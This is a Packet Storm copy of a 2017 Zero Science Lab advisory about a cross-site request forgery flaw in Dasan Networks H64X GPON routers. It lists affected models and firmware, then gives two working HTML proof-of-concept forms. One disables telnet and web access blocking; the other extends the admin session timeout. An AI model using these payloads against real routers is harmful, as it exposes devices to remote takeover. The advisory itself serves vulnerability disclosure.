Dasan Networks GPON ONT WiFi Router H64X Series Cross Site Request Forgery

2017-07-13T00:00:00
ID PACKETSTORM:143353
Type packetstorm
Reporter LiquidWorm
Modified 2017-07-13T00:00:00

Description

                                        
                                            `  
Dasan Networks GPON ONT WiFi Router H64X Series Cross-Site Request Forgery  
  
  
Vendor: Dasan Networks  
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu  
Affected version: Model: H640GR-02  
H640GV-03  
H640GW-02  
H640RW-02  
H645G  
Firmware: 3.03p1-1145  
3.03-1144-01  
3.02p2-1141  
2.77p1-1125  
2.77-1115  
2.76-9999  
2.76-1101  
2.67-1070  
2.45-1045  
  
Summary: H64xx is comprised of one G-PON uplink port and four ports  
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It  
helps service providers to extend their core optical network all the  
way to their subscribers, eliminating bandwidth bottlenecks in the  
last mile. H64xx is integrated device that provide the high quality  
Internet, telephony service (VoIP) and IPTV or OTT content for home  
or office. H64xx enable the subscribers to make a phone call whose  
quality is equal to PSTN at competitive price, and enjoy the high  
quality resolution live video and service such as VoD or High Speed  
Internet.  
  
Desc: The application interface allows users to perform certain actions  
via HTTP requests without performing any validity checks to verify the  
requests. This can be exploited to perform certain, if not all actions  
with administrative privileges if a logged-in user visits a malicious  
web site.  
  
Tested on: Server: lighttpd/1.4.31  
Server: DasanNetwork Solution  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5422  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5422.php  
  
  
19.05.2017  
  
--  
  
  
Enable telnet access (disable telnet blocking):  
Enable web access (disable web blocking):  
-----------------------------------------------  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.0.1:8080/cgi-bin/remote_mgmt_action.cgi" method="POST">  
<input type="hidden" name="rdoIPhost2TelnetBlocking" value="0" />  
<input type="hidden" name="rdoIPhost2WebBlocking" value="0" />  
<input type="hidden" name="waiting_action" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
Increase session timeout (0: disable, min: 1, max: 60):  
-------------------------------------------------------  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.0.1:8080/cgi-bin/websetting_action.cgi" method="POST">  
<input type="hidden" name="sessionTimeout" value="60" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`